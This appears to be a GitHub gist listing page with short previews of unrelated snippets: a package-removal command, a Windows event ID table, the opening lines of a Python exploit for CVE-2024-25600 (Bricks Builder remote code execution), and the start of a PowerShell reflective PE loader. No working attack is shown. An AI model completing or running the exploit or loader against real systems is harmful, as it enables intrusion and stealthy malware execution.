sudo apt purge --autoremove -y \
gnome-software gnome-software-plugin-deb gnome-software-plugin-fwupd \
"libreoffice*" "mythes-*" "hyphen-*" "hunspell-*" \
"fcitx*" "mozc*" "anthy*" ibus-anthy \
"hdate*" libhdate-common \
"dict-*" "goldendict*" \
"mlterm*" xiterm+thai \
thunderbird yelp \
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2024-25600 (Bricks Builder RCE) | |
| import requests | |
| import sys | |
| import urllib3 | |
| import re | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
| def fetch_nonce(target_url): |
A reference for triaging security alerts
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx
| Event ID | Description |
|---|---|
| 4624 | An account was successfully logged on |
| 4625 | An account failed to log on |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Reflectively load a PE file | |
| $code = @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.IO; | |
| public class PELoader | |
| { | |
| [DllImport("kernel32.dll", SetLastError = true)] | |
| private static extern IntPtr GetCurrentProcess(); |
NewerOlder